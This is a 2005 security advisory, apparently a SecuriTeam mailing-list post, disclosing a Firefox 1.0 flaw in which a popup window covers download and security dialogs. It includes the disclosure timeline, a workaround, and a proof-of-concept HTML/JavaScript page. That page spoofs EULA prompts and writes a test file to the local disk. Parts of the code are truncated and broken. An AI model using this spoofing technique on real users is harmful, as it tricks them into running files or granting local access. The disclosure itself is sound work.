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[NT] Mozilla Firefox Window Spoofing (Firespoofing)

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From: SecuriTeam <>
To: [email protected]
Date: 11 Jan 2005 14:07:31 +0200
Subject: [NT] Mozilla Firefox Window Spoofing (Firespoofing)
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  Mozilla Firefox Window Spoofing (Firespoofing)


Using JavaScript it is possible to spoof the content of security and 
download dialogs by partly covering them with a popup window. This can 
fool a user to download and automatically execute a file (if a file 
extension association exists) or to grant a script local data access (if 
codebase principals are enabled).


Affected Software:
 * Mozilla Firefox version 1.0
 * Mozilla version 1.7.5
 * Netscape version 7.1

All under Windows XP SP2

Expected Behavior:
Modal dialogs should always be on top and it should not be possible to 
obfuscate their appearance.

Vendor Status:
The bug is confirmed but currently unfixed (open for more than 3 months). 
As a partial workaround set dom.disable_window_flip to true in 
about:config. The vendor failed to respond to multiple status requests 
which led to this public disclosure.

2004-09-20 Vendor informed ( #260560)
2004-09-20 Vendor confirmed bug
2004-10-20 Status request (open for 1 month - no reply)
2005-01-03 Status request (open for 3 months - no reply)
2005-01-07 Status request (disclosure warning - no reply)
2005-01-11 Public disclosure

The PoC is designed for Firefox 1.0 running in a maximized window.

Part 1 - download dialog spoofing
Shows how to cover a download dialog and fool the user to execute a file 
with a standard windows file association (in this case a .ht file). BTW, 
remember the latest .ht buffer overflow...

Part 2 - security dialog spoofing
Shows how to cover a security dialog. Make sure codebase principals are 
enabled (not default but encouraged by many XUL sites). Creates the file 
c:\booom.txt to proof local system access.

The exploit is also available at:  <>;
< html>
< head>
 < title>Firefox Dialog Spoofing - Proof-of-Concept -<;/title>
< script>
function spoofDownload(){

    window.location = "booom.php"

    var pWin = false;
    var pWidth = 364
    var pHeight = 225
    var pLeft = (screen.width) / 2 - 185;
    var pTop = (screen.height) / 2 - 200;
    var pLorem = 'Lorem ipsum dolor sit amet, consectetuer adipiscing 
elit. Pellentesque lectus dui, porttitor sit amet, varius aliquam, 
ultrices id, nisl. Donec gravida, justo at gravida feugiat, pede massa 
vehicula magna, ac venenatis felis velit nec lorem. Aenean tempus sapien 
at enim. Pellentesque et massa at justo fermentum ultricies. Ut volutpat 
ligula nec magna. Maecenas ornare pulvinar nisl. Fusce sodales. Vivamus ut 
erat. Cras dolor neque, suscipit non, vestibulum at, sagittis et, arcu. 
Quisque mauris mi, sollicitudin vitae, pretium sit amet, nonummy non, 
    var pHtml = '<strong>You need to accept this EULA before entering the 
style="width:100%;height:140px;font-family:Tahoma,Verdana,Arial;font-size:11px;">' + pLorem + '\n\n' + pLorem + '\n\n' + pLorem + '</textarea><br><br><strong>Do you accept this? Please click OK to confirm.</strong>';

    pWin = open('', 'popUpWin', 'width=' + pWidth + ',height=' + pHeight + 
',left=' + pLeft + ',top=' + pTop + ',screenX=' + pLeft + ',screenY=' + 
pTop + 
    pWin.opener = this;;
    pWin.document.write("< html>< head>< style>body { margin:10px; 
padding:0px; border:0px; overflow:hidden; background-color:buttonface; 
font-family: Tahoma, Verdana, Arial; 
script>window.setTimeout(\"this.focus();\",500);<\/script>" + pHtml + 


function spoofSecurity(){

    var pWin = false;
    var pWidth = 540
    var pHeight = 225
    var pLeft = (screen.width) / 2 - 273;
    var pTop = (screen.height) / 2 - 240;
    var pLorem = 'Lorem ipsum dolor sit amet, consectetuer adipiscing 
elit. Pellentesque lectus dui, porttitor sit amet, varius aliquam, 
ultrices id, nisl. Donec gravida, justo at gravida feugiat, pede massa 
vehicula magna, ac venenatis felis velit nec lorem. Aenean tempus sapien 
at enim. Pellentesque et massa at justo fermentum ultricies. Ut volutpat 
ligula nec magna. Maecenas ornare pulvinar nisl. Fusce sodales. Vivamus ut 
erat. Cras dolor neque, suscipit non, vestibulum at, sagittis et, arcu. 
Quisque mauris mi, sollicitudin vitae, pretium sit amet, nonummy non, 
    var pHtml = '< strong>You need to accept this EULA before entering the 
site:</strong>< br>< br><textarea 
style="width:100%;height:140px;font-family:Tahoma,Verdana,Arial;font-size:11px;">' + pLorem + '\n\n' + pLorem + '\n\n' + pLorem + '</textarea>< br>< br>< strong>Do you accept this? Please click "Allow" to confirm.</strong>';

    pWin = open('', 'popUpWin', 'width=' + pWidth + ',height=' + pHeight + 
',left=' + pLeft + ',top=' + pTop + ',screenX=' + pLeft + ',screenY=' + 
pTop + 
    pWin.opener = this;;
    pWin.document.write("< html>< head>< style>body { margin:10px; 
padding:0px; border:0px; overflow:hidden; background-color:buttonface; 
font-family:Tahoma,Verdana,Arial; font-size:11px;}</style></head>< body>< 
script>window.setTimeout(\"this.focus();\",500);<\/script>" + pHtml + 
 file = 
    file.create(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 420);
 outputStream = 
Components.classes[";1"].createInstance( Components.interfaces.nsIFileOutputStream );
 outputStream.init(file, 0x04 | 0x08 | 0x20, 420, 0);
 output = "booom!";
 outputStream.write(output, output.length);
< body>
< div style="font-family:Verdana;font-size:11px;">

< div style="font-family:Verdana;font-size:15px;font-weight:bold;">Firefox 
Dialog Spoofing - Proof-of-Concept</div>
Designed for Firefox 1.0 (Windows) and a maximized window
< br>< br>

< a href="javascript:spoofDownload()">Open spoofed download dialog</a>
< br>< br>
< a href="javascript:spoofSecurity()">Open spoofed security dialog</a> 
(enable signed.applets.codebase_principal_support)
< br>< br>< br>
Full Advisory: < a href="" 



The information has been provided by  <> Michael Krax.
The original article can be found at:  <>;

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